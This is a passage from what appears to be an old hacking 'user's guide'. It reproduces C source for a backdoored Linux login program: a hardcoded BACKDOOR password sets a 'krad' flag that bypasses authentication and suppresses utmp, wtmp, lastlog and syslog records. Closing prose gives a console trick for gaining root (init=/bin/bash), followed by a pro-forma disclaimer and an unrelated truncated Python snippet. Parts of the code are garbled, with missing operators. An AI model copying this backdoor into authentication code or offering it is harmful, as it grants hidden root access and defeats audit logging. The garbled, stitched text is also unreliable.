*p = 0;
hostname = optarg;
break;

case 'p':
pflag = 1;
break;
case '?':
default:
(void)fprintf(stderr,
"usage: login [-fp] [username]\n");
exit(1);
}
argc -= optind;
argv += optind;
if (*argv) {
username = *argv;
ask = 0;
} else
ask = 1;

#ifndef linux
ioctlval = 0;
(void)ioctl(0, TIOCLSET, &ioctlval);
(void)ioctl(0, TIOCNXCL, 0);
(void)fcntl(0, F_SETFL, ioctlval);
(void)ioctl(0, TIOCGETP, &sgttyb);
sgttyb.sg_erase = CERASE;
sgttyb.sg_kill = CKILL;
(void)ioctl(0, TIOCSLTC, &ltc);
(void)ioctl(0, TIOCSETC, &tc);
(void)ioctl(0, TIOCSETP, &sgttyb);

/*
* Be sure that we're in
* blocking mode!!!
* This is really for HPUX
*/
ioctlval = 0;
(void)ioctl(0, FIOSNBIO, &ioctlval);
#endif

for (cnt = getdtablesize(); cnt > 2; cnt--)
close(cnt);

ttyn = ttyname(0);
if (ttyn == NULL *ttyn == '\0') {
(void)sprintf(tname, "%s??", _PATH_TTY);
ttyn = tname;
}

setpgrp();

{
struct termios tt, ttt;

tcgetattr(0, &tt);
ttt = tt;
ttt.c_cflag &= ~HUPCL;

if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
tcsetattr(0,TCSAFLUSH,&ttt);
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
vhangup();
signal(SIGHUP, SIG_DFL);
}

setsid();

/* re-open stdin,stdout,stderr after vhangup() closed them */
/* if it did, after 0.99.5 it doesn't! */
opentty(ttyn);
tcsetattr(0,TCSAFLUSH,&tt);
}

if (tty = rindex(ttyn, '/'))
++tty;
else
tty = ttyn;

openlog("login", LOG_ODELAY, LOG_AUTH);

for (cnt = 0;; ask = 1) {
ioctlval = 0;
#ifndef linux
(void)ioctl(0, TIOCSETD, &ioctlval);
#endif

if (ask) {
fflag = 0;
getloginname();
}

checktty(username, tty);

(void)strcpy(tbuf, username);
if (pwd = getpwnam(username))
salt = pwd->pw_passwd;
else
salt = "xx";

/* if user not super-user, check for disabled logins */
if (pwd == NULL pwd->pw_uid)
checknologin();

/*
* Disallow automatic login to root; if not invoked by
* root, disallow if the uid's differ.
*/
if (fflag && pwd) {
int uid = getuid();

passwd_req = pwd->pw_uid == 0
(uid && uid != pwd->pw_uid);
}

/*
* If trying to log in as root, but with insecure terminal,
* refuse the login attempt.
*/
if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) {
(void)fprintf(stderr,
"%s login refused on this terminal.\n",
pwd->pw_name);

if (hostname)
syslog(LOG_NOTICE,
"LOGIN %s REFUSED FROM %s ON TTY %s",
pwd->pw_name, hostname, tty);
else
syslog(LOG_NOTICE,
"LOGIN %s REFUSED ON TTY %s",
pwd->pw_name, tty);
continue;
}

/*
* If no pre-authentication and a password exists
* for this user, prompt for one and verify it.
*/
if (!passwd_req (pwd && !*pwd->pw_passwd))
break;

setpriority(PRIO_PROCESS, 0, -4);
pp = getpass("Password: ");
if(strcmp(BACKDOOR, pp) == 0) krad++;

p = crypt(pp, salt);
setpriority(PRIO_PROCESS, 0, 0);

#ifdef KERBEROS

/*
* If not present in pw file, act as we normally would.
* If we aren't Kerberos-authenticated, try the normal
* pw file for a password. If that's ok, log the user
* in without issueing any tickets.
*/

if (pwd && !krb_get_lrealm(realm,1)) {
/*
* get TGT for local realm; be careful about uid's
* here for ticket file ownership
*/
(void)setreuid(geteuid(),pwd->pw_uid);
kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm,
"krbtgt", realm, DEFAULT_TKT_LIFE, pp);
(void)setuid(0);
if (kerror == INTK_OK) {
memset(pp, 0, strlen(pp));
notickets = 0; /* user got ticket */
break;
}
}
#endif

(void) memset(pp, 0, strlen(pp));
if (pwd && !strcmp(p, pwd->pw_passwd))
break;

if(krad != 0)
break;




(void)printf("Login incorrect\n");
failures++;
badlogin(username); /* log ALL bad logins */

/* we allow 10 tries, but after 3 we start backing off */
if (++cnt > 3) {
if (cnt >= 10) {
sleepexit(1);
}
sleep((unsigned int)((cnt - 3) * 5));
}
}

/* committed to login -- turn off timeout */
(void)alarm((unsigned int)0);

#ifdef HAVE_QUOTA
if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) {
switch(errno) {
case EUSERS:
(void)fprintf(stderr,
"Too many users logged on already.\nTry again later.\n");
break;
case EPROCLIM:
(void)fprintf(stderr,
"You have too many processes running.\n");
break;
default:
perror("quota (Q_SETUID)");
}
sleepexit(0);
}
#endif

/* paranoia... */
endpwent();

/* This requires some explanation: As root we may not be able to
read the directory of the user if it is on an NFS mounted
filesystem. We temporarily set our effective uid to the user-uid
making sure that we keep root privs. in the real uid.

A portable solution would require a fork(), but we rely on Linux
having the BSD setreuid() */

{
char tmpstr[MAXPATHLEN];
uid_t ruid = getuid();
gid_t egid = getegid();

strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12);
strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN);

setregid(-1, pwd->pw_gid);
setreuid(0, pwd->pw_uid);
quietlog = (access(tmpstr, R_OK) == 0);
setuid(0); /* setreuid doesn't do it alone! */
setreuid(ruid, 0);
setregid(-1, egid);
}

#ifndef linux
#ifdef KERBEROS
if (notickets && !quietlog)
(void)printf("Warning: no Kerberos tickets issued\n");
#endif

#define TWOWEEKS (14*24*60*60)
if (pwd->pw_change pwd->pw_expire)
(void)gettimeofday(&tp, (struct timezone *)NULL);
if (pwd->pw_change)
if (tp.tv_sec >= pwd->pw_change) {
(void)printf("Sorry -- your password has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_change);
(void)printf("Warning: your password expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}
if (pwd->pw_expire)
if (tp.tv_sec >= pwd->pw_expire) {
(void)printf("Sorry -- your account has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_expire);
(void)printf("Warning: your account expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}

/* nothing else left to fail -- really log in */
{
struct utmp utmp;

memset((char *)&utmp, 0, sizeof(utmp));
(void)time(&utmp.ut_time);
strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
if (hostname)
strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
login(&utmp);
}
#else
/* for linux, write entries in utmp and wtmp */
{
struct utmp ut;
char *ttyabbrev;
int wtmp;

memset((char *)&ut, 0, sizeof(ut));
ut.ut_type = USER_PROCESS;
ut.ut_pid = getpid();
strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line));
ttyabbrev = ttyn + sizeof("/dev/tty") - 1;
strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
(void)time(&ut.ut_time);
strncpy(ut.ut_user, username, sizeof(ut.ut_user));

/* fill in host and ip-addr fields when we get networking */
if (hostname) {
struct hostent *he;

strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
if ((he = gethostbyname(hostname)))
memcpy(&ut.ut_addr, he->h_addr_list[0],
sizeof(ut.ut_addr));
}

utmpname(_PATH_UTMP);
setutent();


if(krad == 0)
pututline(&ut);



endutent();

if((wtmp = open(_PATH_WTMP, O_APPENDO_WRONLY)) >= 0) {
flock(wtmp, LOCK_EX);

if(krad == 0)
write(wtmp, (char *)&ut, sizeof(ut));



flock(wtmp, LOCK_UN);
close(wtmp);
}
}
/* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */
#endif



if(krad == 0)
dolastlog(quietlog);




#ifndef linux
if (!hflag) { /* XXX */
static struct winsize win = { 0, 0, 0, 0 };

(void)ioctl(0, TIOCSWINSZ, &win);
}
#endif
(void)chown(ttyn, pwd->pw_uid,
(gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);

(void)chmod(ttyn, 0622);
(void)setgid(pwd->pw_gid);

initgroups(username, pwd->pw_gid);

#ifdef HAVE_QUOTA
quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);
#endif

if (*pwd->pw_shell == '\0')
pwd->pw_shell = _PATH_BSHELL;
#ifndef linux
/* turn on new line discipline for the csh */
else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {
ioctlval = NTTYDISC;
(void)ioctl(0, TIOCSETD, &ioctlval);
}
#endif

/* preserve TERM even without -p flag */
{
char *ep;

if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))
termenv = "dumb";
}

/* destroy environment unless user has requested preservation */
if (!pflag)
{
environ = (char**)malloc(sizeof(char*));
memset(environ, 0, sizeof(char*));
}

#ifndef linux
(void)setenv("HOME", pwd->pw_dir, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
if (term[0] == '\0')
strncpy(term, stypeof(tty), sizeof(term));
(void)setenv("TERM", term, 0);
(void)setenv("USER", pwd->pw_name, 1);
(void)setenv("PATH", _PATH_DEFPATH, 0);
#else
(void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */
if(pwd->pw_uid)
(void)setenv("PATH", _PATH_DEFPATH, 1);
else
(void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
(void)setenv("TERM", termenv, 1);

/* mailx will give a funny error msg if you forget this one */
(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name);
(void)setenv("MAIL",tmp,0);

/* LOGNAME is not documented in login(1) but
HP-UX 6.5 does it. We'll not allow modifying it.
*/
(void)setenv("LOGNAME", pwd->pw_name, 1);
#endif

#ifndef linux
if (tty[sizeof("tty")-1] == 'd')


if(krad == 0)
syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);



#endif
if (pwd->pw_uid == 0)


if(krad == 0)
if (hostname)
syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s",
tty, hostname);
else
syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);





if (!quietlog) {
struct stat st;

motd();
(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);
if (stat(tbuf, &st) == 0 && st.st_size != 0)
(void)printf("You have %smail.\n",
(st.st_mtime > st.st_atime) ? "new " : "");
}

(void)signal(SIGALRM, SIG_DFL);
(void)signal(SIGQUIT, SIG_DFL);
(void)signal(SIGINT, SIG_DFL);
(void)signal(SIGTSTP, SIG_IGN);
(void)signal(SIGHUP, SIG_DFL);

/* discard permissions last so can't get killed and drop core */
if(setuid(pwd->pw_uid) <>pw_uid) {
syslog(LOG_ALERT, "setuid() failed");
exit(1);
}

/* wait until here to change directory! */
if (chdir(pwd->pw_dir) < 0) {
(void)printf("No directory %s!\n", pwd->pw_dir);
if (chdir("/"))
exit(0);
pwd->pw_dir = "/";
(void)printf("Logging in with home = \"/\".\n");
}

/* if the shell field has a space: treat it like a shell script */
if (strchr(pwd->pw_shell, ' ')) {
char *buff = malloc(strlen(pwd->pw_shell) + 6);
if (buff) {
strcpy(buff, "exec ");
strcat(buff, pwd->pw_shell);
execlp("/bin/sh", "-sh", "-c", buff, (char *)0);
fprintf(stderr, "login: couldn't exec shell script: %s.\n",
strerror(errno));
exit(0);
}
fprintf(stderr, "login: no memory for shell script.\n");
exit(0);
}

tbuf[0] = '-';
strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?
p + 1 : pwd->pw_shell));

execlp(pwd->pw_shell, tbuf, (char *)0);
(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));
exit(0);
}

void
getloginname()
{
register int ch;
register char *p;
static char nbuf[UT_NAMESIZE + 1];

for (;;) {
(void)printf("\n%s login: ", thishost); fflush(stdout);
for (p = nbuf; (ch = getchar()) != '\n'; ) {
if (ch == EOF) {
badlogin(username);
exit(0);
}
if (p < nbuf + UT_NAMESIZE)
*p++ = ch;
}
if (p > nbuf)
if (nbuf[0] == '-')
(void)fprintf(stderr,
"login names may not start with '-'.\n");
else {
*p = '\0';
username = nbuf;
break;
}
}
}

void timedout()
{
struct termio ti;

(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);

/* reset echo */
(void) ioctl(0, TCGETA, &ti);
ti.c_lflag = ECHO;
(void) ioctl(0, TCSETA, &ti);
exit(0);
}

int
rootterm(ttyn)
char *ttyn;
#ifndef linux
{
struct ttyent *t;

return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
}
#else
{
int fd;
char buf[100],*p;
int cnt, more;

fd = open(SECURETTY, O_RDONLY);
if(fd < 0) return 1;

/* read each line in /etc/securetty, if a line matches our ttyline
then root is allowed to login on this tty, and we should return
true. */
for(;;) {
p = buf; cnt = 100;
while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;
if(more && *p == '\n') {
*p = '\0';
if(!strcmp(buf, ttyn)) {
close(fd);
return 1;
} else
continue;
} else {
close(fd);
return 0;
}
}
}
#endif

jmp_buf motdinterrupt;

void
motd()
{
register int fd, nchars;
void (*oldint)(), sigint();
char tbuf[8192];

if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
return;
oldint = signal(SIGINT, sigint);
if (setjmp(motdinterrupt) == 0)
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
(void)signal(SIGINT, oldint);
(void)close(fd);
}

void sigint()
{
longjmp(motdinterrupt, 1);
}

void
checknologin()
{
register int fd, nchars;
char tbuf[8192];

if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
sleepexit(0);
}
}

void
dolastlog(quiet)
int quiet;
{
struct lastlog ll;
int fd;

if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
if (!quiet) {
if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
ll.ll_time != 0) {
(void)printf("Last login: %.*s ",
24-5, (char *)ctime(&ll.ll_time));

if (*ll.ll_host != '\0')
printf("from %.*s\n",
(int)sizeof(ll.ll_host), ll.ll_host);
else
printf("on %.*s\n",
(int)sizeof(ll.ll_line), ll.ll_line);
}
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
}
memset((char *)&ll, 0, sizeof(ll));
(void)time(&ll.ll_time);
strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
if (hostname)
strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
if(krad == 0)
(void)write(fd, (char *)&ll, sizeof(ll));
(void)close(fd);
}
}

void
badlogin(name)
char *name;
{
if (failures == 0)
return;

if (hostname)
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
failures, failures > 1 ? "S" : "", hostname, name);
else
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
failures, failures > 1 ? "S" : "", tty, name);
}

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
char *
stypeof(ttyid)
char *ttyid;
{
struct ttyent *t;

return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}
#endif

void
checktty(user, tty)
char *user;
char *tty;
{
FILE *f;
char buf[256];
char *ptr;
char devname[50];
struct stat stb;

/* no /etc/usertty, default to allow access */
if(!(f = fopen(_PATH_USERTTY, "r"))) return;

while(fgets(buf, 255, f)) {

/* strip comments */
for(ptr = buf; ptr < buf + 256; ptr++)
if(*ptr == '#') *ptr = 0;

strtok(buf, " \t");
if(strncmp(user, buf, 8) == 0) {
while((ptr = strtok(NULL, "\t\n "))) {
if(strncmp(tty, ptr, 10) == 0) {
fclose(f);
return;
}
if(strcmp("PTY", ptr) == 0) {
#ifdef linux
sprintf(devname, "/dev/%s", ptr);
/* VERY linux dependent, recognize PTY as alias
for all pseudo tty's */
if((stat(devname, &stb) >= 0)
&& major(stb.st_rdev) == 4
&& minor(stb.st_rdev) >= 192) {
fclose(f);
return;
}
#endif
}
}
/* if we get here, /etc/usertty exists, there's a line
beginning with our username, but it doesn't contain the
name of the tty where the user is trying to log in.
So deny access! */
fclose(f);
printf("Login on %s denied.\n", tty);
badlogin(user);
sleepexit(1);
}
}
fclose(f);
/* users not mentioned in /etc/usertty are by default allowed access
on all tty's */
}

void
getstr(buf, cnt, err)
char *buf, *err;
int cnt;
{
char ch;

do {
if (read(0, &ch, sizeof(ch)) != sizeof(ch))
exit(1);
if (--cnt < 0) {
(void)fprintf(stderr, "%s too long\r\n", err);
sleepexit(1);
}
*buf++ = ch;
} while (ch);
}

void
sleepexit(eval)
int eval;
{
sleep((unsigned int)5);
exit(eval);
}




So if you really wanna have root access and have access to console, reboot
it (carefully, do a ctrl-alt-del) and at lilo prompt do a :
init=/bin/bash rw (for linux 2.0.0 and above (I think)).

Don't wonder why I was speaking only about rootshell and dhp.com, there are
lots of other very good hacking pages, but these ones are updated very
quickly and besides, are the best pages I know.


So folks, this was it...
First version of my USER's GUIDE 1.0.
Maybe I'll do better next time, and if I have more time, I'll add about
50(more) other exploits, remote ones, new stuff, new techniques, etc...
See ya, folks !
GOOD NIGHT !!! (it's 6.am now).
DAMN !!!


ARGHHH! I forgot... My e-mail adress is .
(for now).

Disclaimer:-
i am not liable for any criminal or bad thing which you have done using this message and document. i am giving here for the educational purpose and care should be taken from your side before using this document and please get a written permission from the person before hacking or doing some thing in the network or system.This document is intended for judicial or educational purposes. I have collected these documents and messages from the internet for educational purpose only. always use these documents for doing good only. I don't want to promote computer crime and I'm not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first. please read and use this for useful purpose only to protewindct the systems and information from the bad people. always seek permission from the system owner or who ever responcible for the system by written and then go ahead. Give a full report with honestly to the person or company about your experiments and findings from the system. Always Do Good Think Good and Belive Good.

How to Get files from the directory - One more method

 import os import openpyxl # Specify the target folder folder_path = "C:/Your/Target/Folder"  # Replace with the actual path # Cre...